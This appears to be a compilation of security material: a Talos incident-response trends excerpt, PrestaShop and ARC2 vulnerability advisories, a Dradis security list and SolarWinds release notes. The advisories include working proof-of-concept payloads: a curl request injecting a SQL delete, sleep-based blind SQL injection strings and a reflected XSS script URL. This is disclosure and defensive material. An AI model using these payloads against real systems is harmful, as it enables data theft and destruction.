Several known vulnerabilities contributed to adversaries gaining initial access via exploiting public-facing applications. In one incident, Talos IR identified activity consistent with exploitation of the WordPress vulnerability, tracked as CVE-2021-24867, in AccessPress Plugin and Theme. As a result, Talos IR identified approximately 20 different web shells and/or website defacements, likely from multiple threat actors identifying and exploiting this older flaw.

In another web shell engagement, Talos IR identified a vulnerable version of Magento (Adobe Commerce) version 2.4.2 that was operating in the Kubernetes deployment at the time of exploitation. Talos IR identified a total of nine known vulnerabilities for this version of the software, not including extensions. Talos IR recommends upgrading all instances of Magento to the latest available version, and routinely checking for vulnerable outdated extension versions that need patching or removed completely to reduce the available attack surface.

**Security weaknesses**

The lack of multi-factor authentication (MFA) remains one of the biggest impediments for enterprise security. Nearly 30 percent of engagements involved organizations that either had no MFA or only had it enabled on a handful of accounts and critical services. Talos IR frequently observes ransomware and phishing incidents that could have been prevented if MFA had been properly enabled on critical services, such as endpoint detection response (EDR) solutions or VPNs. To help minimize initial access vectors, Talos IR recommends disabling VPN access for all accounts that are not using MFA.

The increase in web shell engagements highlights the need for more vigilance in helping to prevent web shells. Talos provides the following recommendations:

*   Routinely update and patch all software and operating systems to identify and remediate vulnerabilities or misconfigurations in web applications and web servers.
*   In addition to patching, perform general system hardening, including removing services or protocols where they are unnecessary and being aware of all systems exposed directly to the internet.
*   Disable unnecessary php functions in your “php.ini”, such as eval(), exec(), peopen(), proc\_open() and passthru().
*   Frequently audit and review logs from web servers for unusual or anomalous activity.

**Top-observed MITRE ATT&CK techniques**

The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note, this is not an exhaustive list.

Key findings from the MITRE ATT&CK framework include:

*   Exploitation of public-facing applications was the top observed initial access technique, with the increased web shell activity likely contributing to this significant observation.
*   PowerShell is routinely used by adversaries to support a multitude of threats. We continued to observe high usage of PowerShell, in addition to a number of other scripting languages, including Python, Unix shell, and Windows command shell, which enabled web shell execution.
*   The open source red-teaming security toolkit Mimikatz was used to support nearly 60 percent of ransomware and pre-ransomware engagements this quarter. Consistently observed across previous quarters, Mimikatz is a widely used post-exploitation tool used to steal login IDs, passwords, and authentication tokens from compromised Windows systems.

Tactic 

Technique 

Example 

Initial Access (TA0001) 

T1190 Exploit Public-Facing Application  

Attackers successfully exploited a vulnerable application that was publicly exposed to the internet 

Reconnaissance (TA0043) 

T1592 Gather Victim Host Information 

Text file contains details about host 

Persistence (TA0003) 

T1505.003 Server Software Component: Web Shell  

Adversaries deployed web shells against web-based servers 

Execution (TA0002) 

T1059.001 Command and Scripting Interpreter: PowerShell  

Executes PowerShell code to retrieve information about the client's Active Directory environment 

Discovery (TA0007) 

T1046 Network Service Scanning   

Use a network or port scanner utility  

Credential Access (TA0006) 

T1003 OS Credential Dumping 

Deploy Mimikatz and publicly available password lookup utilities 

Privilege Escalation (TA0004)  

1484 Domain Policy Modification

Modify GPOs to execute malicious files  

Lateral Movement (TA0008) 

T1021.001 Remote Desktop Protocol  

Adversary made attempts to move laterally using Windows Remote Desktop 

Defense Evasion (TA0005) 

T1027 Obfuscated Files or Information 

Use base64-encoded PowerShell scripts 

Command and Control (TA0011) 

T1105 Ingress Tool Transfer  

Adversaries transfer/download tools from an external system 

Impact (TA0040) 

T1486 Data Encrypted for Impact  

Deploy Hive ransomware and encrypt critical systems 

Exfiltration (TA0010) 

T1567 Exfiltration Over Web Service 

Use legitimate external web service to  system information  

Collection (TA0009) 

T1560.001 Archive Collected Data 

Adversary leveraged xcopy on Windows to copy files  

Software/Tool 

S0002 Mimikatz 

Use Mimikatz to obtain account logins and passwords

Quarterly Report: Incident Response Trends in Q1 2023

SQL injection vulnerability found in PrestaShop askforaquote v.5.4.2 and before allow a remote attacker to gain privileges via the QuotesProduct::deleteProduct component.

In the module “Ask for a Quote - Convert to order, messaging system” (askforaquote) for PrestaShop, an anonymous user can perform SQL injection before 5.4.3. Release 5.4.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-27843
*   **Published at**: 2023-04-25
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: askforaquote
*   **Impacted release**: < 5.4.3
*   **Product author**: Presta FABRIQUE
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 5.4.2, a sensitive SQL call in class QuotesProduct::deleteProduct() can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted “item\_id” variable.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Proof of concept**

    curl -v -X POST -d 'action=delete_from_cart&item_id=2_9%3Bdelete+from+0test+where+1%23' 'https://preprod.XXXXX/module/askforaquote/QuotesCart'
    

**Patch**

    --- v5.4.1/modules/askforaquote/classes/QuotesProduct.php
    +++ v5.4.2/modules/askforaquote/classes/QuotesProduct.php
    @@ -160,9 +160,9 @@ class QuotesProductCart extends ObjectMo
             $row = Db::getInstance()->getRow(
                 'SELECT qp.`quantity`, qp.`id_product_attribute`
                 FROM `' . _DB_PREFIX_ . 'quotes_product` qp
    -            WHERE qp.`id_product` = ' . pSQL($id_product) . '
    +            WHERE qp.`id_product` = ' . (int) $id_product . '
                 AND qp.`id_quote` LIKE "' . pSQL($id_quote) . '"
    -            AND qp.`id_product_attribute` = ' . pSQL($id_product_attribute)
    +            AND qp.`id_product_attribute` = ' . (int) $id_product_attribute
             );
    @@ -211,16 +211,16 @@ class QuotesProductCart extends ObjectMo
                     }
                 }
     
    -            if ((int)$current_qty < 0) {
    +            if ((int) $current_qty < 0) {
                     return $this->deleteProduct($id_product, $row['id_product_attribute']);
                 }
     
    -            //update current product in cart
    +            // update current product in cart
                 $update = Db::getInstance()->execute(
                     'UPDATE `' . _DB_PREFIX_ . 'quotes_product`
    -                SET `quantity` = ' . pSQL($current_qty) . ', `date_upd` = "' . pSQL(date('Y-m-d H:i:s', time())) . '"
    -                WHERE `id_product` = ' . pSQL($id_product) . ' AND `id_quote` LIKE "' . pSQL($id_quote) .
    -                '" AND `id_product_attribute` = ' . pSQL($id_product_attribute) . '
    +                SET `quantity` = ' . (int) $current_qty . ', `date_upd` = "' . pSQL(date('Y-m-d H:i:s', time())) . '"
    +                WHERE `id_product` = ' . (int) $id_product . ' AND `id_quote` LIKE "' . pSQL($id_quote) .
    +                '" AND `id_product_attribute` = ' . (int) $id_product_attribute . '
                     LIMIT 1'
                 );
    @@ -543,15 +542,15 @@ class QuotesProductCart extends ObjectMo
             /* Product deletion */
             $result = Db::getInstance()->execute(
                 'DELETE FROM `' . _DB_PREFIX_ . 'quotes_product`
    -            WHERE `id_product` = ' . pSQL($id_product) . '
    +            WHERE `id_product` = ' . (int) $id_product . '
                 AND `id_quote` LIKE "' . pSQL($this->id_quote) . '"
    -            AND `id_product_attribute` = ' . pSQL($id_product_attribute)
    +            AND `id_product_attribute` = ' . (int) $id_product_attribute
             );
     
             if ($result) {
                 return true;
             }
            //$this->update(true);
     
             return false;
         }
    

**Other recommandations**

*   It’s recommended to upgrade the module beyond 5.4.2.
*   Upgrade PrestaShop beyond 1.7.8.8 (and 8.0.1) to disable multiquery executions (separated by “;”).
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-10-09

Issue discovered during a code review by 202 ecommerce and Touchweb

2023-02-12

Request a CVE ID

2023-02-28

Contact the author

2023-03-01

The author confirm the issue

2023-03-17

Propose 30 days before disclosure

2023-03-19

The author confirm a fix release in progress

2023-03-22

The author published the release 5.4.2

2023-04-25

Publication of this security advisory

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

CVE-2023-27843: [CVE-2023-27843] Improper neutralization of a SQL parameter in askforaquote module for PrestaShop

ARC (aka ARC2) through 2011-12-01 allows reflected XSS via the end_point.php query parameter in an output=htmltab action.

November 22, 2012 at 11:34 am - Filed under Hacks - 1408 words, reading time ~4 minutes - Permalink - Comments

Simone "negator" Onofri and Luca "beinux3" Napolitano found multiple issues in ARC2, providing RDF and SPARQL functionalities to PHP applications and working with MySQL as backend. Found vulnerabilities include SQL Injection and XSS.

ARC v2011-12-01 Multiple vulnerabilities

 Name              ARC2 v2011-12-01 Multiple vulnerabilities
 Systems Affected  ARC2 v2011-12-01
 Severity          High
 Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
 Vendor            https://github.com/semsol/arc2
 Advisory          http://www.ush.it/team/negator/hack-arc\_2011-12-01/adv.txt
 Author            Simone "negator" Onofri, Luca "beinux3" Napolitano
 Date              20121123

I. BACKGROUND

ARC is a flexible RDF system for semantic web and PHP practitioners. 
It's free, open-source, easy to use, and runs in most web server 
environments.

II. DESCRIPTION

ARC version v2011-12-01 and lower is affected by Blind SQL Injection and
Cross Site Scripting vulnerabilities, in particular the SPARQL+ 
Endpoint.

III. ANALYSIS

Summary:
       A) Blind SQL Injection (SQLI) Vulnerability 
       B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in ARC version v2011-12-01.

ARC stores triples into a mySQL database and uses a translator from 
SPARQL and SQL. To improve debugging of the application the developer 
has included comments that contain the query string value. It's possible
to Inject SQL commands on these comments if data passed is into a SPARQL
WHERE clause.

In the "getTriplePatternSQL()" function, "ARC2\_StoreSelectQueryHandler
.php" file, the query sent to MySQL is automatically debugged (without 
the ability to conditionally disable such feature) plugging comments 
containing the pattern's "S P O" (Subject, Predicate, Object; the 
semantic web triple concept) values.

SPARQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PREFIX iam: <http://x>
SELECT \* WHERE {
   ?user iam:user "lol\*/ OR (SELECT sleep(5))=1--" . 
}
LIMIT 100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Actual MySQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

SELECT
  T\_0\_0\_0.s AS \`user\`, 
    T\_0\_0\_0.s\_type AS \`user type\`
FROM arc\_tests\_triple T\_0\_0\_0
WHERE (T\_0\_0\_0.p = 0) /\*FIX-IT http://xuser \*/
  AND (T\_0\_0\_0.o = 0) /\*FIX-IT lol\*/ OR (SELECT sleep(5))=1-- \*/
LIMIT 0,100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

What follows is a demo exploitation of the SPARQL Endpoint.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$query = 'PREFIX iam: <http://x>
 SELECT \* WHERE {
  ?user iam:user "lol\*/ OR (SELECT sleep(5))=1--".?password iam:hasPassw
  ord "password" .
 } LIMIT 100';
$store->setUp();
$store->query($query, 'rows')

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for
example using TRUE/FALSE statements (tautology).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end\_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx
>%0D%0ASELECT+\*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol\*%2F+OR+%28SELE
CT+sleep%285%29%29%3D1--".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&sho
w\_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Blind SQL Injection is: High 10/10, vector 
(AV:N/AC:L/Au:N/C:C/I:C/A:C).

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in ARC version 
v2011-12-01 endpoint function.

The GET variable "query" is reflected in page without proper encoding 
when the "output" option is set to "htmltab".

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

<div class="results">
 Could not properly handle "<script src=/lol.it/x><script>" in 
 ARC2\_SPARQLPlusParser
</div>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end\_point.php?query=<script+src%3D%2Flol.it%2Fx><
script>&output=htmltab&jsonp=&key=&show\_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Reflected Cross Site Scripting is Medium 4.3/10, 
vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).

IV. DETECTION

ARC2 v2011-12-01 and possibly earlier versions are vulnerable.

V. WORKAROUND

Update ARC2 to the latest release or manually fix the "ARC2\_StoreEndpoin
t.php" and other files as described by the commit ID 0a39922edaf6a72c5af
60aaeaff7bc4e92a6d342.

https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342

VI. VENDOR RESPONSE

Issues fixed in GIT commit 0a39922.
 
VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned:
 - The name CVE-2012-5872 to Blind SQL Injection Vulnerability. 
 - The name CVE-2012-5873 to Reflected Cross Site Scripting 
   Vulnerability.

This is a candidate for inclusion in the CVE list http://cve.mitre.org, 
which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

20121110 Bug discovered
20121110 Vendor contacted
20121111 Vendor responded
20121111 Vendor fixed SQLI
20121115 Vendor fixed XSS
20121115 Advisory release scheduled for 20121123
20121123 Advisory released

IX. REFERENCES

Well you know what SQLi and XSS are, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this
vulnerability.

Luca "beinux3" Napolitano is credited for the discovery of this
vulnerability.

Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Luca "beinux3" Napolitano
web site:http://www.network-tsunami.com/
mail: beinux3 AT gmail DOT com

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2012 

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, 
this information.

CVE-2012-5873: ush.it - a beautiful place

Dradis before 4.8.0 allows persistent XSS by authenticated author users, related to avatars.

This page lists all security vulnerabilities fixed in released versions of **Dradis**. Each vulnerability is given a security impact rating by the Dradis core team - please note that this rating may vary from platform to platform. We also list the versions of **Dradis** the flaw is known to affect, and where a flaw has not been verified list the version with a question mark.

Please send comments or corrections for these vulnerabilities to: **security\[ {at} \]dradisframework{ \[dot\] }org**

**Fixed in Dradis 4.8.0****medium: Authenticated (author) persistent cross-site scripting**

Insufficient validation around avatars resulted in arbitrary JavaScript code execution.

Affects: Pro: 4.7.0 and possibly older versions of Dradis.

**Fixed in Dradis 4.5.0****medium: Authenticated (author) broken access control: read access to issue content**

An author can read issue content when they are not authorized to access it.

Affects: CE: 4.4.0, Pro: 4.4.1 and possibly older versions of Dradis.

**Fixed in Dradis 4.3.0****Low: Password reset token can be reused in a 5-minute window**

The password reset token can be reused in a 5-minute window.

Affects: Pro: 4.2.0 and possibly older versions of Dradis.

Credit: Goktug Serez

**Fixed in Dradis 4.2.0****low: Authenticated author broken access control: read access to screenshots**

An author can access screenshots from another project.

Affects: CE: 4.1.0, Pro: 4.1.2 and possibly older versions of Dradis.

**Fixed in Dradis 4.1.2****high: Authenticated (author) path traversal vulnerability**

An author can gain authorized access.

Affects: CE: 4.1.0, Pro: 4.1.1 and possibly older versions of Dradis.

Credit: Kristian Varnai

**Fixed in Dradis 4.1.0****medium: Authenticated (author) broken access control: read access to issue content**

An author can read issue content when they are not authorized to access it.

Affects: CE: 4.0.0, Pro: 4.0.0 and possibly older versions of Dradis.

Credit: Kristian Varnai

**Fixed in Dradis 4.0.0****medium: Authenticated (contributor) information disclosure**

After a contributor had been assigned Gateway access to a project by an admin user they may retain access to the project after the projects team has been changed.

Affects: Pro: 3.12.2 and possibly older versions of Dradis when using the Gateway addon.

**Fixed in Dradis 3.11****medium: Authenticated (admin) persistent cross-site scripting**

Insufficient validation around custom fields resulted in arbitrary JavaScript code execution.

Affects: CE: 3.15, Pro: 3.5.0 and possibly older versions of Dradis.

Credit: Michelle Flanagan

**Fixed in Dradis 3.10.1****medium: Authenticated (author) persistent cross-site scripting**

Insufficient validation around avatars resulted in arbitrary JavaScript code execution.

Affects: CE: 3.15, Pro: 3.5.0 and possibly older versions of Dradis.

**Fixed in Dradis 3.9.1****high: Authenticated (author) information disclosure**

An author who is disabled by admins may continue to use the API.

Affects: Pro: 3.5.1 and possibly older versions of Dradis.

**Fixed in Dradis 3.7.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around Comment textareas input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.16, Pro: 3.6.0 and possibly older versions of Dradis.

Credit: Erik Cabetas

**low: Authenticated (admin) persistent cross-site scripting**

Insufficient output encoding around the Methodology templates resulted in arbitrary JavaScript code execution.

Affects: Pro 3.6.0 and possibly older versions of Dradis.

**Fixed in Dradis 3.6.0****high: Authenticated (author) information disclosure**

An author with an active session who is disabled by admins may continue to operate within the application

Affects: Pro 3.5.1 and possibly older versions of Dradis.

**medium: Authenticated (admin) data modification**

An admin can update another user's comment by sending a custom request.

Affects: Pro 3.5.0 and possibly older versions of Dradis.

Credit: Security Compass

**Fixed in Dradis 3.5.0****high: Authenticated (author) information disclosure**

An author without permission on a project may obtain info from that project using the API.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

Credit: Bastian Faure & Florian Nivette

**medium: Authenticated (author) information disclosure**

Mentioning a user in a comment, which does not have access to the project, could result in disclosure of content from future comments in the same thread.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

**Fixed in Dradis 3.4.1****high: Authenticated (author) path traversal vulnerability**

Uploading a malicious zip file it is possible to place files in undesired locations on the filesystem.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

Credit: Props go to Emil Sågfors.

**medium: Authenticated (author) information disclosure**

Information from other projects could be disclosed to other users in the system that happened to be using the application concurrently.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

**low: Authenticated (admin) SQL Injection**

A SQL injection vector exploitable by administrator accounts only was identified affecting the Contributors module.

Affects: Pro: 3.4 to 3.2.

**Fixed in Dradis 3.2.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around Evidence title resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

**medium: Authenticated persistent cross-site scripting**

Inline display of some attachments resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

**Fixed in Dradis 3.11.1****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.1 and possibly older versions of Dradis.

Credit: Props go to Ohji Kashiwazaki and Sabina Rzeźwicka.

CVE-2019-5925

**Fixed in Dradis 3.10.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.9, Pro: 2.9 and possibly older versions of Dradis.

Credit: Props go to Robert Diepeveen

**Fixed in Dradis 3.6.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the revision history module resulted in arbitrary JavaScript code execution.

Affects: CE: 3.x, Pro: 2.X and possibly older versions of Dradis.

Credit: Props go to Marly Wilson

**Fixed in Dradis 3.1.0.rc2****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the node labels resulted in arbitrary JavaScript code execution.

Affects: 3.1.0.rc1 and possibly older versions of Dradis.

Credit: Props go to Mahmoud Reda

**Fixed in Dradis 2.5.2****high: Unauthenticated reflected cross-site scripting**

Insufficient output encoding could result in arbitrary JavaScript code being executed if a specially crafted file was uploaded by an authenticated user.

Affects: 2.5.1, 2.5.0 and possibly older versions of Dradis.

Credit: Props go to Russ McRee for identifying this issue.

CVE not assigned yet

**Fixed in Dradis 2.0.1****high: Missing authentication**

The authentication filter was found to be missing in two components of the server module (notes and configuration).

This was fixed in revision 598

Affects: 2.0.0

CVE-2009-0670 (candidate)

CVE-2023-31223: Security Reports | Dradis Framework

The SolarWinds Platform was susceptible to the Exposure of Sensitive Information Vulnerability. This vulnerability allows users to access Orion.WebCommunityStrings SWIS schema object and obtain sensitive information.

Release date: April 18, 2023

These release notes describe the new features, improvements, and fixed issues in SolarWinds Platform 2023.2. They also provide information about upgrades and describe workarounds for known issues.

Learn more

*   For information on latest hotfixes, see SolarWinds Platform Hotfixes.
*   For release notes for previous SolarWinds Platform versions, see Previous Version documentation.
*   For information about requirements, see SolarWinds Platform 2023.2 System Requirements.
*   For information about working with the SolarWinds Platform, see the SolarWinds Platform Administrator Guide.

**New features and improvements in SolarWinds Platform**

Return to top

SolarWinds Platform 2023.2 offers the following improvements compared to previous releases of SolarWinds Platform.

*   Security improvements for external alert actions. Only users with server admin rights are able to create new external actions. See Approve alert actions executing a script.
    
*   SMTP authentication improvements
    
*   SSH security improvements
    

**Other improvements**

*   SolarWinds Platform Agent now supports RHEL 9.0.
    
*   Credential API now supports SAM.
    

**New customer installation**

Return to top

For information about installing SolarWinds Platform, see SolarWinds Installer.

**How to upgrade**

Use the SolarWinds Installer to upgrade your entire SolarWinds Platform deployment (all SolarWinds Platform products and any scalability engines) to the current versions.

You must be on Orion Platform 2020.2.1 or later to upgrade to SolarWinds Platform 2023.2. If you are on Orion Platform 2020.2 or earlier, first upgrade to 2020.2.6 and then upgrade to 2023.2.

**Before you upgrade from 2020.2.x**

*   Before upgrading from Orion Platform 2020.2.6 and earlier to SolarWinds Platform 2022.3 or later, make sure the database user you use to connect to your SQL Server has the **db create** privilege. **Without this privilege, the upgrade will not complete.**
    
*   The legacy syslog and traps functionality has been retired and replaced with new functionality called SolarWinds Log Viewer, which can be upgraded to Log Analyzer for additional capabilities. Current rules and history will automatically be migrated to the new logging functionality (SolarWinds Log Viewer or Log Analyzer). The functionality of SolarWinds Log Viewer and Log Analyzer has been improved to more closely match legacy functionality. See LA 2022.3 release notes for details.
    
    If you built syslog and trap alerts using custom SQL queries, they will not function after upgrading to 2022.3 or later. SolarWinds recommends you rewrite the alerts using SWQL (Orion.OLM entities) or using the alerting functionality built into Log Viewer/Log Analyzer.
    
*   Some upgrade situations from the Orion Platform to the SolarWinds Platform are not supported and the installer will stop the upgrade automatically.
    *   If you have a SQL Server older than 2016.
    *   If you have an Orion Platform product version 2020.2 or earlier.

**Fixed issues**

Return to top

SolarWinds Platform 2023.2 fixes the following issues.

 

Case Number

Description

1279130, 1281943,1287850,1290108, 1291149, 1301934, 1302724, 1306120, 1309026

The issues with saving the configuration archive on a network share were addressed.

1286152, 1288976, 1289910, 1290594, 1291107, 1297401, 1307087

The issue where date and time in custom reports did not match the format specified in Time Period was addressed.

1257590, 1280347

The issue where database maintenance was failing after the upgrade was addressed.

1121180

The issues with Azure Cloud Details views were addressed.

1232029

Removed SolarWinds Platform Agent plugins are marked for uninstallation after the upgrade.

1289446

The issue where SolarWinds Administration Service read and wrote the package type to an incorrect registry path was addressed.

1272370, 1273749

The issue where importing alerts with SQL macro variables was blocked for Admin users was addressed.

842639

The issue where time zones of SQL server and SolarWinds Platform polling engines showed a warning even when the zones were the same was addressed.

1052957, 1240424, 1245960, 1246538, 1256606, 1257671, 1266763, 1276328, 1267382, 1279002, 1280926, 1281291, 1283928, 1288216, 1290612, 1291755, 1295777, 1296218, 1297821, 1297859

SolarWinds Information Service performance issues when users without admin rights use PerfStack were addressed.

1270128

The issue where the Configuration Wizard failed when configuring the website because of an applicationHost.config error was addressed.

894237

The issue where Global search could not be disabled on some pages was addressed.

1278031

The issue where users could not set up new alerts using DateTime was addressed.

1229785, 1244480, 1274324

The issue where manually created connections on Maps only showed when the Auto-Generated connection box was selected was addressed.

1264223, 1279159

The issue where scalability engines could be upgraded to the version installed on the main polling engine when upgrades for the main polling engine were available was addressed.

N/A

The issue where the name of sender was not specified for some out-of-the-box alerts was addressed.

1125893, 1220248, 1239230, 1244512, 1249564, 1251466, 1254246, 1258643, 1258669, 1260390, 1261995, 1262474, 1264367, 1265533

The partition management during the Database Maintenance was optimized.

The issue where installation/upgrade failed because of a locked file was addressed.

1241480

The issue where the send trap alert action stops working after the upgrade from 2020.2.6 was addressed.

1236663, 1236783, 1241870, 1242442, 1244793, 1249353, 1251317, 1273624

The issue when attempting to add accounts was addressed.

1207061

The installation error while running the centralized upgrade was addressed.

1249722

The issues with the "less than X objects meet the condition" condition in alerts were addressed.

1245612, 1248898

The issues with the Configuration Wizard launching automatically was addressed.

1244008

The issue where custom charts changed behavior was addressed.

1229115

The issue where AmsProxy logs stopped logging on log level change was addressed.

1237514, 1243831, 1245680, 1274269, 1289216

The issue where the node last boot was displayed using UTC was addressed. Last boot is displayed using the local time.

1154578

The issue with loading Subcategory when creating a ServiceNow incident was addressed.

826160, 864527, 873077

The issue where no error message was displayed when the upgrade failed was addressed.

1239689, 1279354

The issue where the Permission Checker fails on upgrade from 2020.2.6 for additional polling engines was addressed.

1228441

The issue where the category was not parsed correctly in All Nodes widgets was addressed.

1234160, 1254686

The issue where proportional widgets do not parse statuses was addressed.

1205283

The issue where Windows Agents generated high CPU usage was addressed.

1228673

The issue where the installation fails if there is another suspended MSI installation in the system was addressed.

1214950

The issue where latency between polling engines was incorrectly indicated on the main server was addressed.

1216266

The issue with time zones of SQL server and the main polling engine was addressed.

1187919, 1209102

The issue with Fortinet Fortigate 101E incorrectly polling IP addresses was addressed.

1202271, 1246753, 1256631, 1259934, 1263843, 1282054, 1289795

The issue where scheduled unmanaging issues caused false positive alerts was addressed.

1217121, 1291663

The issue where upgrade from 2020.2.6 fails in the Circuit wizard when the bound HTTPS certificate is not available on the system anymore was addressed.

1194008

The issue where administrators could update the database with queries in the Add/Edit Report wizard was addressed.

1186572, 1288230

The issue where users could not save changed rows in Manage Entities was addressed.

1154256

The issue where users could not change the SNMPv3 credentials set for a node was addressed.

930171, 990401, 1048906, 1054670, 1095761, 1102507, 1208626

The issues with obsolete records in Cortex documents were addressed.

1163369

The issues with assigning a new dashboard as the default summary view were addressed.

1150632

The issue where the testing credentials for the execute external program alert action triggered the action instead of only validating the credentials was addressed.

1106632

The issues with using SQL/SWQL variables in the SMS alert action were addressed.

1128730

The issue where the Active Diagnostics test "Check Engines and OrionServers integrity" was case-sensitive was addressed.

1198603, 1204150, 1226617, 1228488, 1269783, 1278674, 1279332

The issue where the PerfStack real-time polling ignored account permissions was addressed.

1088944

The issue where volume charts behave differently for administrators and non-administrators was addressed.

318702, 874297, 932513, 1076268, 1200393

The issue where audit events for alert suppression showed time in UTC was addressed.

773793, 916997, 1092088

The issue where High Availability applications and components are not licensed was addressed.

631312, 807280, 817116, 1048102, 1051103, 1133802

The issues with latest baseline graphs were addressed.

**CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2022-47509

SolarWinds Platform Incorrect Input Neutralization Vulnerability

The SolarWinds Platform was susceptible to the Incorrect Input Neutralization Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform account to append URL parameters to inject HTML.

4.3 Medium

Juampa Rodriguez (@UnD3sc0n0c1d0)

CVE-2022-36963

SolarWinds Platform Command Injection Vulnerability

The SolarWinds Platform was susceptible to the Command Injection Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform admin account to execute arbitrary commands.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-47505

SolarWinds Platform Local Privilege Escalation Vulnerability

The SolarWinds Platform was susceptible to the Local Privilege Escalation Vulnerability. This vulnerability allows a local adversary with a valid system user account to escalate local privileges.

7.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-23839

SolarWinds Platform Exposure of Sensitive Information Vulnerability

The SolarWinds Platform was susceptible to the Exposure of Sensitive Information Vulnerability. This vulnerability allows users to access Orion.WebCommunityStrings SWIS schema object and obtain sensitive information.

6.8 Medium

 

**Known issues**

Return to top

 

1310500

Configuration Wizard stops progressing

**Issue**: When you upgrade to 2023.2 RC1, the Configuration Wizard stops progressing, usually at 0-5% complete.

**Workaround**:

1.  Cancel the Configuration Wizard, for example by ending it in the Task Manager.
